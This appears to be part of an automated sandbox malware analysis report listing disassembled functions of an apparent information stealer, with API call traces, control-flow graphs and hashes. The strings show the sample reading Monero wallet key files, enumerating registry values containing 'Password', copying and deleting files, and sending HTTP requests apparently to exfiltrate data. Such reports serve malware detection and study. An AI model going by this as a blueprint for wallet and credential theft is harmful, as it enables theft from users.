                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                                                                        • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1693 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1693 1694 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1694 1694->1693 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1889 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1889 1889->1886
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 004045FA
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04403720), ref: 00404AA8
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                                                        • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 460715078-2398766951
                                                                                                                                                                                                                                                                                        • Opcode ID: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                                                                        • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,043EC0B8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                        • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                                                                        • Opcode ID: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                                                                        • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 348468850-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                                                                        • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                                          • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,044035B0), ref: 00404ED9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                        • API String ID: 2054947926-218353709
                                                                                                                                                                                                                                                                                        • Opcode ID: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                                                                        • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,00000000), ref: 00407018
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020, : ), ref: 0040702A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,00000000), ref: 0040705F
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,00000000), ref: 004070A3
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(36B6C020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                                                        • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                                                        • String ID: : $`v@$h0A
                                                                                                                                                                                                                                                                                        • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                                                                                        • Opcode ID: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
                                                                                                                                                                                                                                                                                        • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: image/jpeg
                                                                                                                                                                                                                                                                                        • API String ID: 0-3785015651
                                                                                                                                                                                                                                                                                        • Opcode ID: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00404C70 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404C8A
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00404C91
